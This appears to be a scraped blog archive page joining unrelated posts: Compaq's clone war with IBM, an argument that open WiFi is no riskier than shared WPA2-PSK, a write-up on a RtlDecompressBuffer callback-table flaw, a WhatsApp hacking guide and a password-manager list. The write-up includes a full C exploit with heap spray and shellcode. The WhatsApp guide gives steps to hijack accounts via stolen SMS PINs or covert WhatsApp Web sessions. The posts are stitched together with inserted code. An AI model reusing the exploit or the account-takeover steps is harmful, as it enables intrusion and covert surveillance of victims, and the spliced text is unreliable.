Friday, June 12, 2020

Everyone Against IBM! Or How the Company Compaq Defeated (With a Little Help From Friends) the Giant IBM in the PC War

In the fantastic and wonderful series "Halt and Catch Fire", which is loosely based on the story of Compaq (especially in its first season), one of the greatest feats of engineering (and, incidentally, of marketing too) is shown, with all due respect to Steve Wozniak and his Apple I. In it the two protagonists want to build an IBM-compatible computer, but to do so they first have to overcome a major obstacle: creating a BIOS "similar" to the one made by the Blue Giant (or Big Blue, IBM's nickname).

Figure 1: Everyone against IBM! or how the company Compaq defeated (with a little help from friends) the giant IBM in the PC war

This is exactly what really happened when the first employees of the company Compaq set out to create a cheaper computer that could run the applications written for IBM. And this triggered perhaps the greatest commercial battle of all time, at least in the world of computers. By the way, you can find this whole story and many others about genuine hackers in our book "Microhistorias: Anécdotas y Curiosidades de la historia de la Informática (y los hackers)" from 0xWord.

Figure 2: The book Microhistorias: Anécdotas y curiosidades de la historia de la informática (y los hackers) at 0xWord

This task, of course, was far from easy. Compaq's three founders, Rod Canion, Jim Harris and Bill Murto, were clear that the process had to be handled very carefully. To keep IBM from accusing them of plagiarism for copying the BIOS, they decided to create one themselves. To do so they reverse-engineered IBM's BIOS and, starting from that information, built their own, thereby avoiding a lawsuit (although, as we will see later, they would not escape that entirely). For this arduous task they created two teams: one would reverse-engineer the original BIOS, as described above, and the other would start from scratch to build a new one from the first team's findings.

Figure 3: Jim Harris, Bill Murto and Rod Canion, founders of Compaq

To sum up this part of the story (everything surrounding the founding of Compaq and the reverse engineering would fill another Microhistoria), they finally succeeded, and so the first IBM clone, which was also portable, was born: the Compaq Portable (around $3,500 at the time, with two floppy drives). Although they invested a million dollars in manufacturing, it was highly profitable, bringing in more than 111 million in the first year on the market alone. Mission accomplished, but this is only the beginning of the story of David (and a few friends) against Goliath.

Figure 4: The first IBM-compatible computer, the Compaq Portable

As you can imagine, IBM did not sit idly by. It tried by every means to stop Compaq from bringing its clones to market, using all of its legal resources (which amounted to veritable armies of lawyers). In the end they got Compaq to pay several million in fines for infringing their patents, which curiously had nothing to do with the BIOS but with other components of the computer, such as the power supply.

But Compaq had opened Pandora's box. Other manufacturers of the day saw the gold mine in building IBM-compatible personal computers, since these dominated the software business, especially business management software. So IBM had to do something radical if it did not want to lose the market that had been exclusively its own for years.

Figure 5: Original Compaq logo

By the late eighties Compaq was already selling more computers than IBM, something truly unthinkable a few years earlier. In 1987, in a desperate counter-move against Compaq, IBM surprised the industry with a new technology called Micro Channel Architecture, the 16/32-bit Micro Channel bus (MCA), far superior in functionality to the ISA bus technology of the day. At the same time they launched a brand-new computer that implemented this new architecture: the IBM PS/2. The idea was to offer something new and innovative that would keep the clone makers busy for a few years and thereby retake the lead in the PC market.

The new hardware was a radical change. Besides the new MCA, it included other new features such as the now-famous PS/2 port for keyboard and mouse and a dual BIOS: one for compatibility with the old PCs (Compatible BIOS, CBIOS) and an entirely new one (Advanced BIOS, ABIOS). This new ABIOS included a protected mode used by the OS/2 operating system, IBM's other surprise.

Figure 6: Models of IBM's PS/2 family

OS/2 was an operating system (developed together with Microsoft) announced at the same time as the IBM PS/2; the problem was that it reached the market a little late, so the first models shipped with the classic IBM PC DOS 3.3. Even so, the gamble looked like it was going to work. The new architecture was far better than the previous one and, moreover, practically all the software (the great asset every manufacturer wanted to keep) was compatible.

Added to this new hardware was OS/2, which offered features that were innovative for the time, such as a protected mode, a graphical API and a new file system called HPFS. This new assault by IBM could not fail; it had everything: faster and more efficient hardware (although none of the hardware developed up to then could be installed in this new computer) and, on top of that, a new foundation for developing more advanced software.

Figure 7: Appearance of OS/2 Warp, which bears a reasonable resemblance to Windows

IBM protected all the technology of the IBM PS/2 to the point of near absurdity. The number of patents covering every component, whether software or hardware, was truly immense. They could not let what had happened with Compaq happen again. This time they would build a new empire, but with their rules laid down from the ground up. In fact, the fees they charged (up to 5%) for a third-party company to use their new technology were truly exorbitant, which meant that only a small number of companies dared to manufacture hardware or software compatible with the PS/2.

So IBM sat back to await its competitors' reaction, not without a certain satisfaction, because if they wanted to continue their strategy of "imitating" its products, this time everything was tied up so that they would have to pay up. But their competitors' response, against all odds, completely surprised IBM and the industry in general.

Figure 8: An IBM XGA-2 32-bit graphics card with MCA technology

In 1988, only a year after IBM's move, the nine main manufacturers of IBM clones at the time, AST Research, Compaq Computer (leading the consortium), Epson, HP, NEC, Olivetti, Tandy, WYSE and Zenith Data Systems, responded to this challenge by doing something truly innovative that IBM did not expect at all: they created a new "open" standard called EISA, compatible with all existing IBM PC XT-Bus hardware. But it also offered new features (such as bus mastering, which allowed access to 4 GB of memory) to make it faster and more efficient, almost at the level of MCA. IBM did not see this coming.

Figure 9: The EISA bus

This complete change of strategy wrong-footed the Blue Giant, which tried by every means to push its IBM PS/2 and OS/2, but little by little EISA won the battle. EISA was cheaper to implement and, being open, anyone could manufacture it. The final battle for supremacy in the PC industry had begun, but EISA had been born to win from the very first moment.

IBM might have won this battle if, instead of creating something new and totally incompatible, it had focused a little more on compatibility with the old systems and brought out something similar to EISA, but with more affordable fees and royalties for its use. That way the other companies would have had no choice but to follow in its wake, with IBM staying at the head. Unfortunately, its radical strategy drove its competitors to release an open system, causing a split in the market that IBM ended up losing.

Figure 10: EISA and ISA video card, ELSA Winner 1000

After the failure of MCA and the PS/2, despite their being a great computer and operating system, IBM began its decline as a PC manufacturer. Even so, IBM stayed afloat on PS/2 sales (it sold 1.5 million units) and even went on, in 1996, to build computers with the EISA bus built in, until PCI arrived. But IBM stalled in the PC market and finally, in 2004, sold its computer division to the Chinese company Lenovo. IBM never recovered from the tremendous failure of the PS/2 and the unexpected strategy of the gang of nine. Compaq had won the PC war.

But the most curious thing of all is that the real winner at the end of all these merciless battles has been IBM. After its fierce fight with Compaq, IBM focused more on (enterprise) software, servers and even supercomputers, that is, on more research and supercomputing. Today IBM is one of the leaders in research related to Artificial Intelligence (AI) with its brand-new Watson, AI hardware and software aimed at business, launching Power9, for example, and it is betting heavily on the quantum computer. It also owns one of the most widespread commercial Linux distributions, Red Hat. IBM is possibly the best implicit demonstration of how to reinvent yourself when something or someone takes away our "cheese", something that now, unfortunately, we have to bear in mind more than ever given the new global situation, as Chema Alonso explained in this post.

Figure 10: The IBM Watson supercomputer

But IBM has survived and remains at the forefront of technological innovation. In fact, the first commercial quantum computer was also built by IBM. Are we at the gates of a new war, this time for the quantum computer market? In a way, IBM is back at the front of the "PC" (quantum this time). In any case, let's see who is brave enough to reverse-engineer the BIOS of a quantum computer, if it even has one ;). Incidentally, the documentary "Silicon Cowboys" tells the story of Compaq and its war with IBM in detail. Not bad for three entrepreneurs who originally wanted to open a Mexican restaurant … good thing they changed their minds.

Happy Hacking Hackers!!!

Authors:

Fran Ramírez (@cyberhadesblog) is a security researcher and member of the Ideas Locas team at CDO in Telefónica, co-author of the book "Microhistorias: Anécdotas y Curiosidades de la historia de la informática (y los hackers)", of the book "Docker: SecDevOps" and of "Machine Learning aplicado a la Ciberseguridad", as well as of the CyberHades blog. You can contact Fran Ramírez on MyPublicInbox.

Rafael Troncoso (@tuxotron) is a Senior Software Engineer at SAP Concur, co-author of the book "Microhistorias: Anécdotas y Curiosidades de la historia de la informática (y los hackers)" and of the book "Docker: SecDevOps", as well as of the CyberHades blog. You can contact Rafael Troncoso on MyPublicInbox.

Thursday, June 11, 2020

Mythbusters: Is An Open (Unencrypted) WiFi More Dangerous Than A WPA2-PSK? Actually, It Is Not.

Introduction


Whenever security professionals recommend the 5 most important IT security practices to average users, one of the items is usually something like "Avoid using open WiFi", "Always use a VPN while using open WiFi" or "Avoid sensitive websites (e.g. online banking) while using open WiFi", etc.

What do I think about this? It is bullshit. But let's not jump to conclusions. Let's analyze all the risks and factors here.


During the following analysis, I make two assumptions. The first is that we are comparing public WiFi hotspots with no encryption at all (referred to as Open) with public WiFi hotspots using WPA2-PSK (and just hope WEP died years ago). The other assumption is that there are people who are security-aware, and those who just don't care. They just want to browse the web, access Facebook, write e-mails, etc.

The risks


Let's discuss the different threats people face using public hotspots, compared to home/work internet usage:

1. Where the website session data is not protected with SSL/TLS (and the cookie is not protected with the Secure flag), attackers on the same hotspot can obtain the session data and use it to steal sessions or login credentials. Typical protocols affected:

  • HTTP sites
  • HTTPS sites but unsecured cookie
  • FTP without encryption
  • IMAP/SMTP/POP3 without SSL/TLS or STARTTLS

2. Attackers can inject extra data into the HTTP traffic, which can be used for exploits or social engineering attacks (e.g. "update Flash Player" with our malware); see the Dark Hotel campaign.

3. Attackers can use tools like SSLStrip to keep the user's traffic on clear-text HTTP and steal passwords/session data/personal information.

4. Attackers can monitor and track user activity

5. Attackers can directly attack the user's machine (e.g. SMB service)

WPA2-PSK security


So, why is a public WPA2-PSK WiFi safer than an open WiFi? Spoiler alert: it is not!

In a generic public WPA2-PSK scenario, all users share the same password. And guess what: the whole traffic can be decrypted with the following information: SSID + shared password + information from the 4-way handshake (https://wiki.wireshark.org/HowToDecrypt802.11). If you want to see it in action, here is a nice tutorial: Decrypted WPA2-PSK traffic.

Any user with access to the same WPA2-PSK network knows this information, so they can instantly decrypt your traffic. Or the attackers can just set up an access point with the same SSID, the same password, and a stronger signal. And now the attacker can instantly launch active man-in-the-middle attacks. It is a common belief (even among ITSEC experts) that WPA2-PSK is not vulnerable to this attack. I am not sure why this vulnerability was left in the protocol; if you have the answer, let me know. Edit (2015-08-03): I think the key message here is that without server authentication (e.g. via PKI), it is not possible to solve this.
Let me link one of my previous posts here with a great skiddie tool:

To sum up, attackers on a WPA2-PSK network can:

  • Decrypt all HTTP/FTP/IMAP/SMTP/POP3 passwords or other sensitive information
  • Launch active attacks like SSLStrip, or modify HTTP traffic to include exploit/social engineering attacks
  • Monitor/track user activity

The only difference between open and WPA2-PSK networks is that an open network can be hacked by an attacker with a skill level of 1 out of 10, while the WPA2-PSK network needs an attacker with a skill level of 1.5. That is the difference.

The real solutions



1. Website owners and service providers should deploy proper (trusted) SSL/TLS infrastructure, protect session cookies, etc. Whenever a user (or security professional) notices a problem with the quality of the service (e.g. missing SSL/TLS), the service provider has to be notified. If no change is made, it is recommended to drop the service provider and choose a more secure one. Users have to use the HTTPS Everywhere plugin.

2. Protect the device against exploits by patching the software on it, use a secure browser (Chrome, IE11 + Enhanced Protected Mode), disable unnecessary plugins (Java, Flash, Silverlight), or at least use them via click-to-play. Also, the use of exploit mitigation tools (EMET, HitmanPro.Alert, Malwarebytes Anti-Exploit) and a good internet security suite is a good idea.

3. Website owners have to deploy HSTS, and optionally include their site in an HSTS preload list.

4. Don't click blindly on fake downloads (like fake Flash Player updates)


5. The benefits of a VPN are usually overestimated. A VPN provider is just another provider, like the hotspot provider or the ISP. They can do the same malicious stuff (traffic injection, traffic monitoring, user tracking). Especially when people use free VPNs. And "Average Joe" will choose a free VPN. Also, VPN connections tend to get disconnected, and almost none of the VPN providers offer fail-secure VPNs. Also, for the price of a good VPN service you can buy a good data plan and use 4G/3G instead of low-quality public hotspots. But despite this, on mobile OSes (Android, iOS, etc.) I strongly recommend the use of a VPN, because it is not practically feasible for users to know which app is using SSL/TLS and which is not.

6. Use a location-aware firewall, and whenever the network is not trusted, set it to Public.

7. In a small-business/home environment, buy a WiFi router with a guest WiFi option, where a different password can be set for the guest network than for the main one.
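Items 1 and 3 above are things a site operator can verify mechanically. The following checker is an added example, not part of the original post: it inspects a raw HTTP response for a session cookie without the Secure/HttpOnly flags and for a missing or weak Strict-Transport-Security header. The two responses it runs over are constructed samples, not captures from any real site, and the one-year HSTS threshold is the value the preload list requires.

```python
"""Audit HTTP response headers for the cookie and HSTS protections a site
should have before anyone uses it from a hostile hotspot. Added example;
the sample responses below are constructed, not captured from a real site."""


def parse_response(raw):
    """Split a raw HTTP response into its status line and lowercase (name, value) pairs."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def cookie_findings(set_cookie):
    """Return the protections missing from one Set-Cookie header value."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    findings = []
    if "secure" not in attrs:
        # Without Secure the browser also sends the cookie over plain HTTP,
        # which is exactly what an SSLStrip-style attacker waits for.
        findings.append(f"cookie {name!r} lacks Secure: it will be sent over plain HTTP too")
    if "httponly" not in attrs:
        findings.append(f"cookie {name!r} lacks HttpOnly: readable by injected script")
    return findings


HSTS_MIN_AGE = 31536000  # one year, the minimum the preload list accepts


def hsts_findings(headers):
    """Check presence and strength of Strict-Transport-Security."""
    values = [v for n, v in headers if n == "strict-transport-security"]
    if not values:
        return ["no Strict-Transport-Security header: SSLStrip-style downgrade stays possible"]
    directives = {}
    for d in values[0].split(";"):
        key, _, val = d.strip().partition("=")
        directives[key.lower()] = val
    findings = []
    try:
        max_age = int(directives.get("max-age", "0"))
    except ValueError:
        max_age = 0
    if max_age < HSTS_MIN_AGE:
        findings.append(f"HSTS max-age {max_age} is below {HSTS_MIN_AGE}")
    if "includesubdomains" not in directives:
        findings.append("HSTS does not cover subdomains")
    return findings


def audit(raw):
    """All findings for one raw response; an empty list means both checks pass."""
    _, headers = parse_response(raw)
    findings = []
    for name, value in headers:
        if name == "set-cookie":
            findings.extend(cookie_findings(value))
    findings.extend(hsts_findings(headers))
    return findings


# Constructed sample responses: one as a careless site would send it, one hardened.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: SESSIONID=abc123; Path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n<html>...</html>"
)
STRONG_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: SESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains; preload\r\n"
    "Content-Type: text/html\r\n"
    "\r\n<html>...</html>"
)

if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("strong", STRONG_RESPONSE)):
        print(label, audit(raw) or ["ok"])
```

Feed it the headers from a real response (for example, the output of `curl -sI https://example.org`, joined with CRLF) and an empty result means the session cookie cannot leak over HTTP and browsers that have seen the site once will refuse a downgrade.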

Asking the question "Are you using open WiFi?", or "Do you do online banking on open WiFi?" are the wrong questions. The good questions are:
  • Do you trust the operator(s) of the network you are using?
  • Are the clients separated?
  • If clients are not separated, is it possible that there are people with malicious intent on the network?
  • Are you security-aware, and are you following the rules previously mentioned? If you do follow these rules, those will protect you on whatever network you are.

And call me an idiot, but I do online banking, e-shopping, and all the other sensitive stuff while I'm using open WiFi. And whenever I order pizza from an HTTP website, attackers can learn my address. Which is already in the phone book, on Facebook, and in the metadata of every photo of my cat that I took with my smartphone and uploaded to the Internet (http://iknowwhereyourcatlives.com/).


Most articles and research publications are full of FUD about what people can learn from others. Maybe they are just outdated, maybe they are not. But it is totally safe to use Gmail on an open WiFi, no one will be able to read my e-mails.

PS: I know "Average Joe" won't find my blog post, won't start to read it, and won't understand half of what I wrote. But even if they do, they won't patch their browser plugins, pay for a VPN, or check the session cookie. So they are doomed to fail. That's life. Deal with it.


RtlDecompressBuffer Vulnerability

Introduction

RtlDecompressBuffer is a WinAPI function implemented in ntdll that is often used by browsers and applications, and also by malware, to decompress buffers compressed with LZ algorithms, for example LZNT1.

The first parameter of this function is a number that selects the algorithm to use for decompression; for example, 2 is LZNT1. This algorithm switch is implemented as a callback table holding pointers to the algorithms, so the bounds of this table must be checked to avoid situations where the execution flow is redirected to unexpected places, especially attacker-controlled heap mappings.

The algorithms callback table
Notice the five NOPs at the end, probably left there for adding new algorithms in the future.

The jump to these pointers, depending on the algorithm number, is:
call RtlDecompressBufferProcs[eax*4]

The boundary checks

We control eax because it is the algorithm number, but the value of eax is limited; let's look at the boundary checks:


int RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6)
{
    int result; // eax@4

    // decompiler's rendering of "test ax, ax" / "cmp ax, 1": algorithms 0 and 1 are rejected
    if ( algorithm & algorithm != 1 )
    {
        // "test al, 0F0h": only the low byte of the index is examined here
        if ( algorithm & 0xF0 )
            result = -1073741217;   // 0xC000025F, STATUS_UNSUPPORTED_COMPRESSION
        else
            result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);
    }
    else
    {
        result = -1073741811;       // 0xC000000D, STATUS_INVALID_PARAMETER
    }
    return result;
}

Judging from that decompilation, it seems we can only select an algorithm number from 2 to 15; note that algorithm 9 is allowed and will jump to 0x90909090, but we can't control that address.

Let's check the disassembly on Win7 32 bits:

  • the movzx limits the index to 16 bits
  • the test ax, ax rejects algorithm 0
  • the cmp ax, 1 rejects algorithm 1
  • the test al, 0F0h limits the boundary .. wait .. al?


Let's compute the largest two-byte number that gets past the test al, 0F0h:

#include <stdio.h>

/* Builds the 16-bit value in eax byte by byte: ah = 0xff, al = 0xf0.
   The "=a" output constraint hands eax back to C explicitly instead of
   relying on the register happening to hold the return value. */
unsigned int max(void) {
        unsigned int eax;
        __asm__("xorl %%eax, %%eax\n\t"
                "movb $0xff, %%ah\n\t"
                "movb $0xf0, %%al"
                : "=a"(eax));
        return eax;
}

int main(void) {
        printf("max: %u\n", max());
        return 0;
}

The value is 65520, but in fact it is simpler than that: what happens if we pass algorithm number 9?

So if we control the algorithm number, we can redirect the execution flow to 0x55ff8890, which can be mapped via heap spraying.
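To make the boundary problem concrete, here is an added example (not the post's code and not ntdll's) that models the check the decompilation above shows beside a hardened version of it. The callback table, the two toy decompression routines and the return codes are constructed stand-ins; the point is that testing `al` against `0xF0` never compares the full 16-bit index with the table length, so both 9 (a NOP slot on the page) and a value with a non-zero high byte are accepted, whereas a bounds check against the actual table size rejects them.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed stand-in for the algorithm callback table discussed above.
   Slots 0 and 1 are invalid (the real table starts at 2 = LZNT1); the
   remaining slots are toy routines. Nothing here touches the real ntdll. */
typedef int (*decompress_fn)(const uint8_t *in, size_t in_len);

static int alg_a(const uint8_t *in, size_t in_len) { (void)in; return (int)in_len; }
static int alg_b(const uint8_t *in, size_t in_len) { (void)in; return (int)in_len * 2; }

#define TABLE_SIZE 4
static const decompress_fn table[TABLE_SIZE] = { NULL, NULL, alg_a, alg_b };

/* Return codes standing in for the NTSTATUS values in the decompiled routine. */
enum { RC_OK = 0, RC_INVALID_PARAMETER = -1, RC_UNSUPPORTED = -2, RC_OUT_OF_TABLE = -3 };

/* Mirrors the check as decompiled above: 0 and 1 are rejected, then only the
   low byte is tested against 0xF0 (test al, 0F0h). The high byte of the
   16-bit index is never examined and nothing compares the index with the
   table length, so 9 and 0x0102 both pass and would be used as an index. */
int check_as_decompiled(uint16_t alg) {
    if (alg == 0 || alg == 1)
        return RC_INVALID_PARAMETER;
    if (alg & 0xF0)
        return RC_UNSUPPORTED;
    return RC_OK;
}

/* Hardened check: the whole index is compared with the table length and
   empty slots are refused, so only a real entry can ever be selected. */
int check_hardened(uint16_t alg) {
    if (alg >= TABLE_SIZE)
        return RC_OUT_OF_TABLE;
    if (table[alg] == NULL)
        return RC_INVALID_PARAMETER;
    return RC_OK;
}

/* Dispatch only after the hardened check; returns the routine's result or a negative rc. */
int dispatch_hardened(uint16_t alg, const uint8_t *in, size_t in_len) {
    int rc = check_hardened(alg);
    if (rc != RC_OK)
        return rc;
    return table[alg](in, in_len);
}

/* Convenience wrapper over a constructed 5-byte input, used by main() below. */
int dispatch_sample(uint16_t alg) {
    static const uint8_t sample[5] = { 1, 2, 3, 4, 5 };
    return dispatch_hardened(alg, sample, sizeof sample);
}

int main(void) {
    uint16_t probes[] = { 0, 1, 2, 9, 0x10, 0x0102 };
    size_t i;
    for (i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("index 0x%04x: decompiled check %d, hardened check %d\n",
               probes[i], check_as_decompiled(probes[i]), check_hardened(probes[i]));
    printf("dispatch_sample(2) -> %d\n", dispatch_sample(2));
    return 0;
}
```

The contrast to look for in the output is index 9 and index 0x0102: the decompiled-style check returns RC_OK for both, the hardened check returns RC_OUT_OF_TABLE. Any dispatcher that indexes a function-pointer table from caller-supplied data needs the second shape of check, regardless of how the rest of the table is laid out.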

Proof of concept

This exploit code tells RtlDecompressBuffer to redirect the execution flow to the address 0x55ff8890, where a mapping holds the shellcode. To reach this address the heap is sprayed with 1 MB chunks.

The result on WinXP:

The result on Win7 32bits:
And the exploit code:

/*
ntdll!RtlDecompressBuffer() vtable exploit + heap spray
by @sha0coder
*/

#define WIN32_NO_STATUS
#include <windows.h>
#undef WIN32_NO_STATUS
#include <ntstatus.h>   // STATUS_* codes used in the switch below
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define KB 1024
#define MB 1024*KB
#define BLK_SZ 4096
#define ALLOC 200
#define MAGIC_DECOMPRESSION_AGORITHM 9

// Prototype of the ntdll export, resolved at run time in main().
typedef NTSTATUS (WINAPI *RtlDecompressBuffer_t)(USHORT CompressionFormat,
    PUCHAR UncompressedBuffer, ULONG UncompressedBufferSize,
    PUCHAR CompressedBuffer, ULONG CompressedBufferSize,
    PULONG FinalUncompressedSize);

// WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php
/*
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"
"\xBF\x77\xFF\xD2\xCC"
"\xE8\xF3\xFF\xFF\xFF"
"\x63\x61\x6C\x63";
*/

// https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
char *shellcode =
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";


PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits

void fail(const char *msg) {
    printf("%s\n\n", msg);
    exit(1);
}

// Allocate 1 MB heap chunks until the heap has grown past the landing address.
PUCHAR spray(HANDLE heap) {
    PUCHAR map = 0;

    printf("Spraying ...\n");
    printf("Aproximating to %p\n", landing_ptr);

    while (map < landing_ptr - 1*MB) {
        map = HeapAlloc(heap, 0, 1*MB);
        if (map == NULL)
            fail("HeapAlloc failed before reaching the landing address");
    }

    //map = HeapAlloc(heap, 0, 1*MB);

    printf("Aproximated to [%p - %p]\n", map, map + 1*MB);

    printf("Landing adddr: %p\n", landing_ptr);
    printf("Offset of landing adddr: %ld\n", (long)(landing_ptr - map));

    return map;
}

// Fill the landing area with int3 so a debugger catches the redirected call.
void landing_sigtrap(int num_of_traps) {
    memset(landing_ptr, 0xcc, num_of_traps);
}

void copy_shellcode(void) {
    memcpy(landing_ptr, shellcode, strlen(shellcode));
}

int main(int argc, char **argv) {
    RtlDecompressBuffer_t RtlDecompressBuffer;
    NTSTATUS ntStat;
    HANDLE heap;
    PUCHAR compressed, uncompressed;
    ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;

    RtlDecompressBuffer = (RtlDecompressBuffer_t)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");
    if (RtlDecompressBuffer == NULL)
        fail("RtlDecompressBuffer not found in ntdll.dll");

    heap = GetProcessHeap();

    compressed_sz = estimated_uncompressed_sz = 1*KB;

    compressed = HeapAlloc(heap, 0, compressed_sz);

    uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);

    spray(heap);
    copy_shellcode();
    //landing_sigtrap(1*KB);
    printf("Landing ...\n");

    // Algorithm 9 is the unchecked slot: the call goes through the table entry there.
    ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);

    switch(ntStat) {
    case STATUS_SUCCESS:
        printf("decompression Ok!\n");
        break;

    case STATUS_INVALID_PARAMETER:
        printf("bad compression parameter\n");
        break;

    case STATUS_UNSUPPORTED_COMPRESSION:
        printf("unsuported compression\n");
        break;

    case STATUS_BAD_COMPRESSION_BUFFER:
        printf("Need more uncompressed buffer\n");
        break;

    default:
        printf("weird decompression state\n");
        break;
    }

    printf("end.\n");
    return 0;
}

The attack vector

This API is called very often in the Windows system, and is also called by browsers, but the attack vector is not common, because the apps that call this API tend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application, service or driver that lets the algorithm number be switched, via ioctl, config, etc., it can be used to elevate privileges on Win7.

How To Hack Any Whatsapp Account In 2020

The article is broken down into different subtopics and subcategories, to make it easy for those who just want to skim through to pick the part of the WhatsApp hack they are most interested in, in case you don't have enough time to go through the entire article.

Search queries like these are a common place; Can WhatsApp be hacked? Can you read WhatsApp messages? How safe is the most popular trade fair in the world? This article gives you all the solution you need to hack any WhatsApp account, as well as how to protect yourself from a WhatsApp hack attack.

Although the messenger is now on an end-to-end encryption, WhatsApp is still not totally safe from espionage. WhatsApp chats and messages can still be accessed and read remotely, and old &deleted WhatsApp chats and messages retrieved.

WhatsApp Spy: Hack WhatsApp Chats and Messages

A very simple solution is to use software that can hack WhatsApp remotely. All vendors offer an extra web portal for reading the WhatsApp messages. Besides WhatsApp messages, they can also spy on other messengers, so you can also get access to social media accounts.

The software may only be installed on a smartphone if the user of the smartphone has been informed about the installation and its effects.

WhatsApp Hacker: 3 Steps to Hack WhatsApp in 2020

You can hack WhatsApp using a second cell phone. No extra SIM card is necessary for this. The guide also works with a tablet. With this method, the only thing the other phone needs in order to clone WhatsApp messages is an internet connection.

The trick to hack Whatsapp successfully is not a software bug. It's the way WhatsApp has developed the setup wizard. Since there are no user accounts with passwords and you log in via the mobile number, here lies the vulnerability. But you can also protect yourself from the Whatsapp hack.

Hack WhatsApp Chat with the Best WhatsApp Hacking Tool

To read Whatsapp messages, the mobile phone number of the target must be known. The cell phone can remain locked. There is no need to install software to hack and read Whatsapp messages. Even with the PIN or fingerprint, the Whatsapp account can be hacked.

STEP 1: Create a New WhatsApp Account

To hack a WhatsApp account, the app from the App Store must be installed on the second cell phone. After the installation of WhatsApp, the target's phone number is entered. The confirmation request must then be waited for until access to the victim's smartphone exists.

STEP 2: WhatsApp Account Confirmation

The confirmation of the Whatsapp account is the actual security risk of the messenger. Whatsapp usually confirms the registration via SMS. Occasionally the confirmation will also be sent by automated phone call via a phone call.

Calls and text messages can be read and taken by anyone even when the screen is locked. So that the WhatsApp hack does not stand out, the SMS must be removed from the start screen by swiping.

STEP 3: Enter Confirmation

The stolen verification PIN is now entered on the second smartphone. As a result, the WhatsApp account has been taken over by you. You can read the WhatsApp messages, which respond to this mobile phone number.

The downside to this trick is that the victim immediately notices the Whatsapp hack as soon as Whatsapp is opened. If the victim goes through the sign-in process again. The attacker loses access to the messages and no Whatsapp messages can be read.

How to Hack Someone's WhatsApp in 2020

A good way to hack a WhatsApp account is to hack whatsapp online. Here you can read WhatsApp messages via a browser and also write. The target user can continue to use his cell phone (works for iOS, Android phone etc) and does not notice the WhatsApp hack.

STEP 1: Access the Cell Phone

In order to be able to read WhatsApp messages by installing software, access to the unlocked smartphone is required for a short time. In addition to the cell phone, a computer or laptop is necessary; on this the WhatsApp messages will be read later.

STEP 2: Access WhatsApp Web

If you have access to the unlocked smartphone, Whatsapp must be started there. The Whatsapp settings include Whatsapp Web . If this is selected, Whatsapp opens a QR code scanner with the hint to open WhatsApp Web in the browser.

If the QR code in the browser is scanned with the smartphone, there is a permanent connection and WhatsApp messages can be read. If you hack WhatsApp in this way, you have full access to all incoming messages and you can even write messages yourself.

STEP 3: Read WhatsApp Messages

The target usually sees this Whatsapp hack only when the settings are invoked to Whatsapp Web in the app. Whatsapp messages can be read via the browser. Regardless of whether the smartphone is on home Wi-Fi or on the move. You can also hack group chats admin by just having any of the contact details.

WhatsApp Hack: How to Hack any WhatsApp account

Which is the most popular messaging app globally? Of course, you can use different apps from Android or iOS to send and receive messages. But Whatsapp remains everyone's favorite globally!

Whatsapp is one of the popular apps in the world. There are more than 2 billion active users on Whatsapp, messaging daily with the app. Why do people love WhatsApp? Whatsapp is very convenient and easy to use.

Other messaging apps, like Facebook Messenger, still need a special account to sign up. If you switch to a new app, you'll need to add another account. This can be stressful, as you have to remember a lot of new passwords and usernames.



Wednesday, June 10, 2020

BEST PASSWORD MANAGERS FOR IOS

As I said, Apple's iOS is also prone to cyber attacks, so you can use some of the best password managers for iOS to secure your online accounts.

BEST PASSWORD MANAGERS FOR IOS

Here I have shortlisted a few of the best password managers for iOS, including Keeper, OneSafe, Enpass, mSecure, LastPass, RoboForm, SplashID Safe and LoginBox Pro.

1. ONESAFE PASSWORD MANAGER (CROSS-PLATFORM)

OneSafe is one of the best Password Manager apps for iOS devices that lets you store not only your accounts' passwords but also sensitive documents, credit card details, photos, and more.
OneSafe password manager app for iOS encrypts your data behind a master password, with AES-256 encryption — the highest level available on mobile — and Touch ID. There is also an option for additional passwords for given folders.
OneSafe password manager for iOS also offers an in-app browser that supports autofill of logins, so that you don't need to enter your login details every time.
